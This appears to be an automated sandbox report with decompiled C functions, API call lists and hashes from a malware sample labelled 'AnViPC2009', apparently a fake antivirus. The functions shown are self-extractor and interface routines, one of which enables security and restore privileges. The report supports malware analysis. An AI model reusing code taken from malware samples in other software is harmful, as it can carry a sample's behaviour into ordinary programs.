                                                                                                                                                  0x0040aecc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040aecc
                                                                                                                                                  0x0040aec3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • SendDlgItemMessageA.USER32(?,00000066,00000171,00000000,00000000), ref: 0040AEEA
                                                                                                                                                  • DestroyIcon.USER32(00000000), ref: 0040AEF5
                                                                                                                                                  • EndDialog.USER32(?,00000005), ref: 0040AEFD
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040AF45
                                                                                                                                                  • SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000100), ref: 0040AF60
                                                                                                                                                  • SendDlgItemMessageA.USER32(?,00000066,00000170,?,00000000), ref: 0040AF77
                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040AF8B
                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0040AFA8
                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040AFB6
                                                                                                                                                  • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0040AFCA
                                                                                                                                                  • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0040AFDD
                                                                                                                                                  • wsprintfA.USER32 ref: 0040B008
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040B019
                                                                                                                                                  • FindClose.KERNEL32(?), ref: 0040B01E
                                                                                                                                                  • wsprintfA.USER32 ref: 0040B05B
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040B06C
                                                                                                                                                  • SendDlgItemMessageA.USER32(?,00000067,00000170,?,00000000), ref: 0040B080
                                                                                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0040B09A
                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040B0A8
                                                                                                                                                  • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0040B0BD
                                                                                                                                                  • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0040B0D2
                                                                                                                                                  • wsprintfA.USER32 ref: 0040B0F7
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040B108
                                                                                                                                                  • wsprintfA.USER32 ref: 0040B14C
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040B15D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Time$Item$File$Text$Formatwsprintf$DateMessageSend$FindSystem$CloseDestroyDialogFirstIconInfoLocal
                                                                                                                                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                  • API String ID: 1296638866-1840816070
                                                                                                                                                  • Opcode ID: 79b052446e981f1dd4b57b2920a81b4df2162506f9d5938393f6bee3e9fc9c82
                                                                                                                                                  • Instruction ID: d71b630460a022489d13e93f2085247ecd22acf21596276d32a384347c690557
                                                                                                                                                  • Opcode Fuzzy Hash: 79b052446e981f1dd4b57b2920a81b4df2162506f9d5938393f6bee3e9fc9c82
                                                                                                                                                  • Instruction Fuzzy Hash: 55914C7258020DBBEB21DFA0CD85FEB37ACEB08740F044472BB05E50D1D6B89A65CB69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040346B() {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                  				int _t11;
                                                                                                                                                  				char _t31;
                                                                                                                                                  
                                                                                                                                                  				_t31 =  *0x41486e; // 0x0
                                                                                                                                                  				if(_t31 == 0) {
                                                                                                                                                  					 *0x41486e = 1;
                                                                                                                                                  					_t11 = OpenProcessToken(GetCurrentProcess(), 0x20,  &_v8);
                                                                                                                                                  					if(_t11 != 0) {
                                                                                                                                                  						_v24.PrivilegeCount = 1;
                                                                                                                                                  						_v12 = 2;
                                                                                                                                                  						if(LookupPrivilegeValueA(0, "SeSecurityPrivilege",  &(_v24.Privileges)) != 0 && AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0) != 0 && GetLastError() == 0) {
                                                                                                                                                  							 *0x41486d = 1;
                                                                                                                                                  						}
                                                                                                                                                  						if(LookupPrivilegeValueA(0, "SeRestorePrivilege",  &(_v24.Privileges)) != 0) {
                                                                                                                                                  							AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                                                                                                                                  						}
                                                                                                                                                  						return CloseHandle(_v8);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t11;
                                                                                                                                                  			}








                                                                                                                                                  0x00403474
                                                                                                                                                  0x0040347a
                                                                                                                                                  0x00403486
                                                                                                                                                  0x00403494
                                                                                                                                                  0x0040349c
                                                                                                                                                  0x004034b0
                                                                                                                                                  0x004034b7
                                                                                                                                                  0x004034c8
                                                                                                                                                  0x004034e5
                                                                                                                                                  0x004034e5
                                                                                                                                                  0x004034fa
                                                                                                                                                  0x00403507
                                                                                                                                                  0x00403507
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403513
                                                                                                                                                  0x0040349c
                                                                                                                                                  0x00403516

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000020,?,00000000,0040377E,?,00000000,?,?), ref: 0040348D
                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403494
                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32 ref: 004034BE
                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 004034D5
                                                                                                                                                  • GetLastError.KERNEL32 ref: 004034DB
                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 004034F6
                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403507
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040350C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Token$AdjustLookupPrivilegePrivilegesProcessValue$CloseCurrentErrorHandleLastOpen
                                                                                                                                                  • String ID: @Mhv$SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                  • API String ID: 2567606174-3604700855
                                                                                                                                                  • Opcode ID: 64bcb0090e4d4d25212edab5216b569426b768200398b1041a14e0e93c7aa550
                                                                                                                                                  • Instruction ID: 7d81605929c947d6144b9ea4fa9dff10e940ff5578ad20a6b2f73eacfddd6434
                                                                                                                                                  • Opcode Fuzzy Hash: 64bcb0090e4d4d25212edab5216b569426b768200398b1041a14e0e93c7aa550
                                                                                                                                                  • Instruction Fuzzy Hash: 99115BB1500209BEEB11EBA59E84EFB7FACEB44348F144036E500E2191D7B59E04CB78
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                  			E00406D16(void* __ecx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				struct tagPOINT _v20;
                                                                                                                                                  				struct HWND__* _t37;
                                                                                                                                                  				struct HWND__* _t38;
                                                                                                                                                  				long _t41;
                                                                                                                                                  				struct HWND__* _t43;
                                                                                                                                                  				struct HWND__* _t44;
                                                                                                                                                  				void* _t74;
                                                                                                                                                  				CHAR* _t75;
                                                                                                                                                  
                                                                                                                                                  				_t74 = __ecx;
                                                                                                                                                  				if( *((char*)(__ecx + 0x14)) == 0) {
                                                                                                                                                  					__imp__OleInitialize(0);
                                                                                                                                                  					__imp__#17();
                                                                                                                                                  					 *((char*)(__ecx + 0x14)) = 1;
                                                                                                                                                  				}
                                                                                                                                                  				 *((char*)(_t74 + 0x15)) = 0;
                                                                                                                                                  				ShowWindow(_a8, 0);
                                                                                                                                                  				E00406CAF(_t74, _a4);
                                                                                                                                                  				 *((intOrPtr*)(_t74 + 0x10)) = _a12;
                                                                                                                                                  				GetWindowRect(_a8,  &_v20);
                                                                                                                                                  				MapWindowPoints(0, GetParent(_a8),  &_v20, 2);
                                                                                                                                                  				_t37 =  *(_t74 + 4);
                                                                                                                                                  				if(_t37 != 0) {
                                                                                                                                                  					DestroyWindow(_t37);
                                                                                                                                                  				}
                                                                                                                                                  				_t38 = GetParent(_a8);
                                                                                                                                                  				_t41 = _v20.x;
                                                                                                                                                  				_t67 = _v12 - _t41;
                                                                                                                                                  				_t43 = CreateWindowExA(0, "RarHtmlClassName", 0, 0x40000000, _t41 + 1, _v20.y, _v12 - _t41, _v8 - _v20.y, _t38, 0,  *_t74, _t74);
                                                                                                                                                  				 *(_t74 + 4) = _t43;
                                                                                                                                                  				if(_t43 != 0) {
                                                                                                                                                  					ShowWindow(_t43, 5);
                                                                                                                                                  					_t43 = UpdateWindow( *(_t74 + 4));
                                                                                                                                                  				}
                                                                                                                                                  				if( *((char*)(_t74 + 0x15)) == 0) {
                                                                                                                                                  					_t44 =  *(_t74 + 4);
                                                                                                                                                  					if(_t44 != 0) {
                                                                                                                                                  						DestroyWindow(_t44);
                                                                                                                                                  						 *(_t74 + 4) = 0;
                                                                                                                                                  					}
                                                                                                                                                  					ShowWindow(_a8, 5);
                                                                                                                                                  					_t61 = E0040A1C5(0x100 + E0040A35D(_t67, _a12) * 6);
                                                                                                                                                  					E0040A450(_t49, _a12);
                                                                                                                                                  					if(E0040657B(_t61) == 0) {
                                                                                                                                                  						E004065AB(_t74, _t61);
                                                                                                                                                  					}
                                                                                                                                                  					_t75 = E004069DB(_t74, _t61);
                                                                                                                                                  					_t43 = E0040A1DE(_t61);
                                                                                                                                                  					if(_t75 != 0) {
                                                                                                                                                  						SetWindowTextA(_a8, _t75);
                                                                                                                                                  						return E0040A1DE(_t75);
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					if( *((intOrPtr*)(_t74 + 0x18)) > 0x64) {
                                                                                                                                                  						return E00406675(_t74);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t43;
                                                                                                                                                  			}













                                                                                                                                                  0x00406d1e
                                                                                                                                                  0x00406d25
                                                                                                                                                  0x00406d29
                                                                                                                                                  0x00406d2f
                                                                                                                                                  0x00406d35
                                                                                                                                                  0x00406d35
                                                                                                                                                  0x00406d44
                                                                                                                                                  0x00406d48
                                                                                                                                                  0x00406d4f
                                                                                                                                                  0x00406d57
                                                                                                                                                  0x00406d61
                                                                                                                                                  0x00406d7b
                                                                                                                                                  0x00406d81
                                                                                                                                                  0x00406d86
                                                                                                                                                  0x00406d89
                                                                                                                                                  0x00406d89
                                                                                                                                                  0x00406d97
                                                                                                                                                  0x00406da6
                                                                                                                                                  0x00406dac
                                                                                                                                                  0x00406dbf
                                                                                                                                                  0x00406dc5
                                                                                                                                                  0x00406dca
                                                                                                                                                  0x00406dcf
                                                                                                                                                  0x00406dd4
                                                                                                                                                  0x00406dd4
                                                                                                                                                  0x00406dde
                                                                                                                                                  0x00406def
                                                                                                                                                  0x00406df4
                                                                                                                                                  0x00406df7
                                                                                                                                                  0x00406dfd
                                                                                                                                                  0x00406dfd
                                                                                                                                                  0x00406e05
                                                                                                                                                  0x00406e20
                                                                                                                                                  0x00406e23
                                                                                                                                                  0x00406e32
                                                                                                                                                  0x00406e37
                                                                                                                                                  0x00406e37
                                                                                                                                                  0x00406e45
                                                                                                                                                  0x00406e47
                                                                                                                                                  0x00406e4e
                                                                                                                                                  0x00406e54
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406e5b
                                                                                                                                                  0x00406de0
                                                                                                                                                  0x00406de4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406de8
                                                                                                                                                  0x00406de4
                                                                                                                                                  0x00406e64

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Show$DestroyParent$CreateInitializePointsRectTextUpdate
                                                                                                                                                  • String ID: RarHtmlClassName
                                                                                                                                                  • API String ID: 2853670363-1658105358
                                                                                                                                                  • Opcode ID: a5054a59ca3af3b649a377b36d2d0bf7addc50ddd2caf3c53cab3c27b1ea4454
                                                                                                                                                  • Instruction ID: 7d84189fce597607ec0bec32f7f4075a13aa85f1f893a8996aed6042c7edaf9c
                                                                                                                                                  • Opcode Fuzzy Hash: a5054a59ca3af3b649a377b36d2d0bf7addc50ddd2caf3c53cab3c27b1ea4454
                                                                                                                                                  • Instruction Fuzzy Hash: 2541F670600314BFDB21AF74DD49FAF7BB9EF44704F01852AF816E2291CB7899208B69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E0040ABB5(void* _a4, signed int _a8, int _a12) {
                                                                                                                                                  				struct HDC__* _v8;
                                                                                                                                                  				struct HDC__* _v12;
                                                                                                                                                  				struct HBITMAP__* _v16;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				signed int _v36;
                                                                                                                                                  				signed int _v40;
                                                                                                                                                  				void _v44;
                                                                                                                                                  				struct HDC__* _t36;
                                                                                                                                                  				signed int _t43;
                                                                                                                                                  				struct HDC__* _t54;
                                                                                                                                                  
                                                                                                                                                  				_t36 = GetDC(0);
                                                                                                                                                  				_v12 = _t36;
                                                                                                                                                  				_t54 = CreateCompatibleDC(_t36);
                                                                                                                                                  				_v8 = CreateCompatibleDC(_v12);
                                                                                                                                                  				GetObjectA(_a4, 0x18,  &_v44);
                                                                                                                                                  				asm("cdq");
                                                                                                                                                  				_t43 = _v36 * _a8 / _v40;
                                                                                                                                                  				if(_t43 < _a12) {
                                                                                                                                                  					_a12 = _t43;
                                                                                                                                                  				}
                                                                                                                                                  				_v16 = CreateCompatibleBitmap(_v12, _a8, _a12);
                                                                                                                                                  				_a4 = SelectObject(_t54, _a4);
                                                                                                                                                  				_v20 = SelectObject(_v8, _v16);
                                                                                                                                                  				StretchBlt(_v8, 0, 0, _a8, _a12, _t54, 0, 0, _v40, _v36, 0xcc0020);
                                                                                                                                                  				SelectObject(_t54, _a4);
                                                                                                                                                  				SelectObject(_v8, _v20);
                                                                                                                                                  				DeleteDC(_t54);
                                                                                                                                                  				DeleteDC(_v8);
                                                                                                                                                  				ReleaseDC(0, _v12);
                                                                                                                                                  				return _v16;
                                                                                                                                                  			}













                                                                                                                                                  0x0040abc1
                                                                                                                                                  0x0040abce
                                                                                                                                                  0x0040abd6
                                                                                                                                                  0x0040abda
                                                                                                                                                  0x0040abe6
                                                                                                                                                  0x0040abf3
                                                                                                                                                  0x0040abf4
                                                                                                                                                  0x0040abfa
                                                                                                                                                  0x0040abfc
                                                                                                                                                  0x0040abfc
                                                                                                                                                  0x0040ac18
                                                                                                                                                  0x0040ac20
                                                                                                                                                  0x0040ac30
                                                                                                                                                  0x0040ac44
                                                                                                                                                  0x0040ac4e
                                                                                                                                                  0x0040ac56
                                                                                                                                                  0x0040ac5f
                                                                                                                                                  0x0040ac64
                                                                                                                                                  0x0040ac6a
                                                                                                                                                  0x0040ac77

                                                                                                                                                  APIs
                                                                                                                                                  • GetDC.USER32(00000000), ref: 0040ABC1
                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0040ABD1
                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0040ABD8
                                                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0040ABE6
                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 0040AC08
                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0040AC1B
                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0040AC26
                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040AC44
                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0040AC4E
                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0040AC56
                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0040AC5F
                                                                                                                                                  • DeleteDC.GDI32(?), ref: 0040AC64
                                                                                                                                                  • ReleaseDC.USER32 ref: 0040AC6A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3950507155-0
                                                                                                                                                  • Opcode ID: 56819850a12cc89720f04a66fc2689964519d0f5c48e7ddfd1700f3f5e00804d
                                                                                                                                                  • Instruction ID: ed0939bf5158b79f47af51a0cf9f034759c115d665509f7dc4984fb6e39a0ab4
                                                                                                                                                  • Opcode Fuzzy Hash: 56819850a12cc89720f04a66fc2689964519d0f5c48e7ddfd1700f3f5e00804d
                                                                                                                                                  • Instruction Fuzzy Hash: B921A476800258FFCF119FA5CD48CDEBFBAFB49350B108466FA14A2120C7759A60EFA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                  			E00406822(intOrPtr __ecx) {
                                                                                                                                                  				char* _t48;
                                                                                                                                                  				short* _t55;
                                                                                                                                                  				signed int _t56;
                                                                                                                                                  				char _t58;
                                                                                                                                                  				short* _t59;
                                                                                                                                                  				char _t62;
                                                                                                                                                  				short* _t64;
                                                                                                                                                  				int _t65;
                                                                                                                                                  				intOrPtr _t83;
                                                                                                                                                  				void* _t86;
                                                                                                                                                  				char* _t87;
                                                                                                                                                  				int _t94;
                                                                                                                                                  				intOrPtr _t95;
                                                                                                                                                  				void* _t96;
                                                                                                                                                  				void* _t98;
                                                                                                                                                  
                                                                                                                                                  				_t96 = _t98 - 0x74;
                                                                                                                                                  				_t48 =  *(__ecx + 0xc);
                                                                                                                                                  				 *((intOrPtr*)(_t96 + 0x60)) = __ecx;
                                                                                                                                                  				if(_t48 == 0) {
                                                                                                                                                  					L27:
                                                                                                                                                  					return _t48;
                                                                                                                                                  				}
                                                                                                                                                  				 *(_t96 + 0x64) = 0;
                                                                                                                                                  				 *((intOrPtr*)( *_t48 + 0x2c))(_t48, L"about:blank", 0, 0, 0, 0, _t86);
                                                                                                                                                  				_t83 = __ecx;
                                                                                                                                                  				 *((char*)(_t96 + 0x6b)) = E0040657B( *(_t96 + 0x7c));
                                                                                                                                                  				_t94 = 0x100 + lstrlenA( *(_t96 + 0x7c)) * 6;
                                                                                                                                                  				_t48 = GlobalAlloc(0x40, _t94);
                                                                                                                                                  				_t87 = _t48;
                                                                                                                                                  				if(_t87 == 0) {
                                                                                                                                                  					L26:
                                                                                                                                                  					goto L27;
                                                                                                                                                  				}
                                                                                                                                                  				 *(_t96 - 0x38) = 0x94;
                                                                                                                                                  				GetVersionExA(_t96 - 0x38);
                                                                                                                                                  				if( *((intOrPtr*)(_t96 - 0x28)) != 1) {
                                                                                                                                                  					L4:
                                                                                                                                                  					 *((char*)(_t96 + 0x73)) = 1;
                                                                                                                                                  					L5:
                                                                                                                                                  					E0040A450(_t87, "<html>");
                                                                                                                                                  					if( *((intOrPtr*)(_t96 + 0x73)) != 0) {
                                                                                                                                                  						E0040A5BB(_t87, "<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
                                                                                                                                                  						 *((intOrPtr*)(_t96 + 0x5c)) = E0040A35D(_t83, _t87) + _t87;
                                                                                                                                                  						E0040A5BB(_t87, "utf-8\"></head>");
                                                                                                                                                  					}
                                                                                                                                                  					_t55 =  *(_t96 + 0x7c);
                                                                                                                                                  					 *(_t96 + 0x6c) = _t55;
                                                                                                                                                  					L9:
                                                                                                                                                  					if( *_t55 == 0x20) {
                                                                                                                                                  						 *(_t96 + 0x6c) =  &(( *(_t96 + 0x6c))[0]);
                                                                                                                                                  						_t55 =  *(_t96 + 0x6c);
                                                                                                                                                  						goto L9;
                                                                                                                                                  					}
                                                                                                                                                  					_t56 = E0040A596( *(_t96 + 0x6c), "<html>", 6);
                                                                                                                                                  					asm("sbb al, al");
                                                                                                                                                  					_t58 =  ~_t56 + 1;
                                                                                                                                                  					 *((char*)(_t96 + 0x6a)) = _t58;
                                                                                                                                                  					if(_t58 == 0) {
                                                                                                                                                  						_t59 =  *(_t96 + 0x7c);
                                                                                                                                                  					} else {
                                                                                                                                                  						_t59 =  &(( *(_t96 + 0x6c))[3]);
                                                                                                                                                  					}
                                                                                                                                                  					E0040A5BB(_t87, _t59);
                                                                                                                                                  					if( *((intOrPtr*)(_t96 + 0x6a)) == 0) {
                                                                                                                                                  						E0040A5BB(_t87, "</html>");
                                                                                                                                                  					}
                                                                                                                                                  					if( *((intOrPtr*)(_t96 + 0x6b)) == 0) {
                                                                                                                                                  						E004065AB( *((intOrPtr*)(_t96 + 0x60)), _t87);
                                                                                                                                                  					}
                                                                                                                                                  					if( *((intOrPtr*)(_t96 + 0x73)) != 0) {
                                                                                                                                                  						_t64 = E0040A1C5(_t94 + _t94);
                                                                                                                                                  						 *(_t96 + 0x6c) = _t64;
                                                                                                                                                  						if(_t64 != 0) {
                                                                                                                                                  							_t65 = MultiByteToWideChar(0, 0, _t87, 0xffffffff, _t64, _t94);
                                                                                                                                                  							_t32 =  &(_t87[3]); // 0x3
                                                                                                                                                  							 *((char*)(_t96 + 0x7f)) = _t65 != 0;
                                                                                                                                                  							if(WideCharToMultiByte(0xfde9, 0,  *(_t96 + 0x6c), 0xffffffff, _t32, _t94, 0, 0) == 0) {
                                                                                                                                                  								 *((char*)(_t96 + 0x7f)) = 0;
                                                                                                                                                  							}
                                                                                                                                                  							E0040A1DE( *(_t96 + 0x6c));
                                                                                                                                                  							if( *((intOrPtr*)(_t96 + 0x7f)) == 0) {
                                                                                                                                                  								 *((char*)( *((intOrPtr*)(_t96 + 0x5c)))) = 0x5f;
                                                                                                                                                  							} else {
                                                                                                                                                  								 *_t87 = 0xef;
                                                                                                                                                  								_t87[1] = 0xbb;
                                                                                                                                                  								_t87[2] = 0xbf;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t48 = _t96 + 0x64;
                                                                                                                                                  					__imp__CreateStreamOnHGlobal(_t87, 1, _t48);
                                                                                                                                                  					if(_t48 >= 0) {
                                                                                                                                                  						_t95 =  *((intOrPtr*)(_t96 + 0x60));
                                                                                                                                                  						 *((char*)(_t95 + 0x15)) = E004064BF( *((intOrPtr*)(_t95 + 0xc)),  *(_t96 + 0x64));
                                                                                                                                                  						_t62 =  *(_t96 + 0x64);
                                                                                                                                                  						_t48 =  *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                                                  					}
                                                                                                                                                  					goto L26;
                                                                                                                                                  				}
                                                                                                                                                  				 *((char*)(_t96 + 0x73)) = 0;
                                                                                                                                                  				if(( *(_t96 - 0x2c) & 0x0000ffff) < 0x7ce) {
                                                                                                                                                  					goto L5;
                                                                                                                                                  				}
                                                                                                                                                  				goto L4;
                                                                                                                                                  			}


















                                                                                                                                                  0x00406823
                                                                                                                                                  0x00406831
                                                                                                                                                  0x00406836
                                                                                                                                                  0x0040683b
                                                                                                                                                  0x004069d2
                                                                                                                                                  0x004069d8
                                                                                                                                                  0x004069d8
                                                                                                                                                  0x0040684b
                                                                                                                                                  0x00406851
                                                                                                                                                  0x00406857
                                                                                                                                                  0x00406861
                                                                                                                                                  0x0040686f
                                                                                                                                                  0x00406878
                                                                                                                                                  0x0040687e
                                                                                                                                                  0x00406882
                                                                                                                                                  0x004069d1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004069d1
                                                                                                                                                  0x0040688c
                                                                                                                                                  0x00406893
                                                                                                                                                  0x0040689d
                                                                                                                                                  0x004068ad
                                                                                                                                                  0x004068ad
                                                                                                                                                  0x004068b1
                                                                                                                                                  0x004068b7
                                                                                                                                                  0x004068bf
                                                                                                                                                  0x004068c7
                                                                                                                                                  0x004068da
                                                                                                                                                  0x004068dd
                                                                                                                                                  0x004068dd
                                                                                                                                                  0x004068e2
                                                                                                                                                  0x004068e5
                                                                                                                                                  0x004068f0
                                                                                                                                                  0x004068f3
                                                                                                                                                  0x004068ea
                                                                                                                                                  0x004068ed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004068ed
                                                                                                                                                  0x004068ff
                                                                                                                                                  0x00406906
                                                                                                                                                  0x00406908
                                                                                                                                                  0x0040690a
                                                                                                                                                  0x0040690d
                                                                                                                                                  0x00406917
                                                                                                                                                  0x0040690f
                                                                                                                                                  0x00406912
                                                                                                                                                  0x00406912
                                                                                                                                                  0x0040691c
                                                                                                                                                  0x00406924
                                                                                                                                                  0x0040692c
                                                                                                                                                  0x0040692c
                                                                                                                                                  0x00406934
                                                                                                                                                  0x0040693a
                                                                                                                                                  0x0040693a
                                                                                                                                                  0x00406942
                                                                                                                                                  0x00406948
                                                                                                                                                  0x0040694d
                                                                                                                                                  0x00406952
                                                                                                                                                  0x0040695b
                                                                                                                                                  0x00406966
                                                                                                                                                  0x0040696f
                                                                                                                                                  0x00406981
                                                                                                                                                  0x00406983
                                                                                                                                                  0x00406983
                                                                                                                                                  0x00406989
                                                                                                                                                  0x00406991
                                                                                                                                                  0x004069a3
                                                                                                                                                  0x00406993
                                                                                                                                                  0x00406993
                                                                                                                                                  0x00406996
                                                                                                                                                  0x0040699a
                                                                                                                                                  0x0040699a
                                                                                                                                                  0x00406991
                                                                                                                                                  0x00406952
                                                                                                                                                  0x004069a6
                                                                                                                                                  0x004069ad
                                                                                                                                                  0x004069b5
                                                                                                                                                  0x004069ba
                                                                                                                                                  0x004069c5
                                                                                                                                                  0x004069c8
                                                                                                                                                  0x004069ce
                                                                                                                                                  0x004069ce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004069b5
                                                                                                                                                  0x004068a3
                                                                                                                                                  0x004068ab
                                                                                                                                                  0x00000000
